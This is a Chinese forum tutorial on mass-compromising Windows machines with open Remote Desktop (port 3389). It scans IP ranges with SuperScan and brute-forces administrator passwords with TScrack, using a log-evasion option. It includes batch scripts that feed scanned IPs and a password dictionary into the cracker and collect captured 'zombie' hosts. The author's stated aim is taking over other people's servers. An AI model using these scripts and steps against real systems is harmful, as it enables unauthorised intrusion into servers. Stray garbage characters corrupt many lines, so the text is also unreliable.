|
作者:霜风 QQ:14226581 1 _5 o( z. A8 q: _2 P4 H
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
8 [4 z0 E' l, `- z% v% Y8 s7 H这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
1 f+ ]% Q+ ~* w0 P& n7 X9 o! o首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:! L6 g7 v! ]1 @/ X, P
先打开superscan3如图1( ]+ r" P0 Q1 Q2 V, W( h
/ H& ^+ d+ U2 |( I此主题相关图片如下:& f7 A) {) v0 r, }- x7 \
7 A. X# z x6 ?5 A$ H Y& A8 d
! u( ]( u- ~4 ^4 E$ J" @/ n( z接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2) e; E4 S0 t F% S0 j3 A, J
& {, X2 Q; M1 o, X: r9 g: ?, p此主题相关图片如下:# Y$ G( d1 A1 P( U8 u. F Q( U
5 h3 F; O# A3 ?- C: @( E
8 c/ U0 R4 @4 m: d然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
6 r) |% G/ M. R' V% C7 `3 ~这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
# @- C2 `- B- D8 |7 n" a3 Q. J1 W# T* w0 R
此主题相关图片如下:
' }. ?4 x8 D7 X+ k6 B4 D1 Y! \& `
7 M4 \! n- y( `* @# U% \9 l0 Q9 ^
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。+ X8 |. N/ C. Z1 p* a
/ L# |) K0 }. n& B' x+ s此主题相关图片如下:
Q' W0 r) c4 N) G+ u& h; J) r9 t- O 1 S7 Q, w4 r7 R) W# H; _0 L8 D2 ]8 N
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5/ z, \+ G9 u0 u- H; ~$ R* f2 _* l' `
* u2 o) V! Z, F% ]
此主题相关图片如下:
6 p- @; v3 Y; u; |% r
: b4 E' M+ S7 e! ^1 T$ C* k9 y进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
9 _( H+ |- b+ j+ [所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
" V# s+ e6 y& {! W E0 RTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
. I) B; X3 P4 n& X, k此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
N& P+ a' M/ l' E \% }+ m0 W在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
: m2 `/ T5 Z2 ~; M% I-h : Print usage help and exit: \" z! R1 S r2 D
-V : Print version info and exit
1 a6 E) O; a7 C4 Q3 w0 Q( |-s : Print chipher strenght info and exit1 _. g6 L9 i) n& Y2 X& |
-b : Enable failed password beep% }1 {, f; O# y2 |
-t : Use two simultaneous connections [EXPERIMENTAL]! p# s+ d; V3 h3 }& Y& k" s) }
-N : Prevent System Log entries on targeted server
" l# S+ P9 C( k' I% B( ~-U : Uninstall tscrack and remove components4 _& {. s/ |/ }1 S
-f <number> : Wordlist entry to start cracking with
! O5 k% f4 I$ a {) P2 P-F <delay> : Sampling Frequency (Delay between samples in ms)
9 [, ], o$ v- y8 ?2 M; x-l <user> : Account name to use, defaults to Administrator
" B0 V( W/ [1 ?-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
+ L, X. X5 y- m( m- A5 A-p <password> : Use <password> to logon instead of wordlist/blank pass
* n B9 B6 p9 K-D <domain> : Specify domain to attempt logon to ; B. w# c- e) ~: z4 y$ |0 K
0 X; h- k7 W. N
& o) e, F! G, i+ d2 f% I7 z5 J
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
/ [# K) C$ R% `: F-h : 显示使用帮助然后退出
# P- O5 l" ~ G I: s, Z+ Y-V : 显示版本信息然后退出$ h9 R% g2 P8 [+ L0 Q+ P7 G; l3 `
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)0 D/ `' s; U0 F1 _
-b : 密码错误时发出声音, f* d ~8 O* r7 ]# U! ]
-t : 同时发出多个连接,就是多线程。
: Z& G3 T9 E7 D6 h" W; T-N : Prevent System Log entries on targeted server% A5 J/ a9 B0 z* }3 @) @$ ^
-U : 卸载移除tscrack组件。- S- j7 g8 ~- R: ?& ?( \3 x, w
-f <number> : 使用-F后面的密码。
4 G0 U1 P8 d% J; y: }! u$ Z- C; b9 I-F <delay> : 间隔时间(频率)8 E' c, l4 Q; X8 Z
-l <user> : 使用-L后面的用户名
- `6 N: d& J0 P-w <wordlist> : 使用-W后面的字典
- W7 d& V5 g# z) y& T- Z5 ~9 L-p <password> : 使用-W后的密码1 u# s$ {$ D8 v5 h* r
-D <domain> : 登陆主页面?
9 M1 A& ^5 h; Y+ P2 \ @6 e# \相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:4 c3 `% u1 J( v
@if not exist IpcScan.txt goto noscan; b/ L2 z$ }9 h, ^% B8 j9 _& E
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i: t( Q6 X5 ]: x$ h4 t# u
:noscan2 C0 B$ }( ]9 d; E( b3 Z
@echo 3389.txt no find or scan faild
) C, p4 O% c9 F这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)- M1 j; I: K/ A
保存后把后错名改为BAT就可以了。
! h1 O, E0 d! _, D U# O; P还写一个BAT,名字为HACK.BAT,代码如下:$ C" v! m. v$ ]+ Y! }
@if not exist tscrack.exe goto noscan
7 P9 [5 W( j- K4 T0 E6 C% c4 ^@tscrack %1 -l administartor -w pass.dic >>rouji.txt& o/ ]! t. c9 L) x
:noscan3 v: [3 [( n# S7 F
@echo tscrack.exe no find or scan faild " G: r, C; W0 p8 }$ R5 T
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC. p# V0 W8 i5 o) q
制作方法如上。
# X' _3 p$ t# |) Q然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
7 [. C1 P( w) J$ V3 V( t+ E+ A& T8 O9 e0 X W* J5 p
此主题相关图片如下:6 F( [( v& ^& i! n. n+ p2 P9 p) Y# X
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic." V1 w8 X2 y9 _* M% ~& P) Z6 `; `# M
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
3 j4 [) P2 s, g+ d- Y( R
# z; A# o! v7 @7 c! Y此主题相关图片如下:9 N* C: j- r. i+ q0 \; \, R: d: j
# A9 t* |0 O+ c怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
* |/ v6 y: f1 C9 R; n最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ |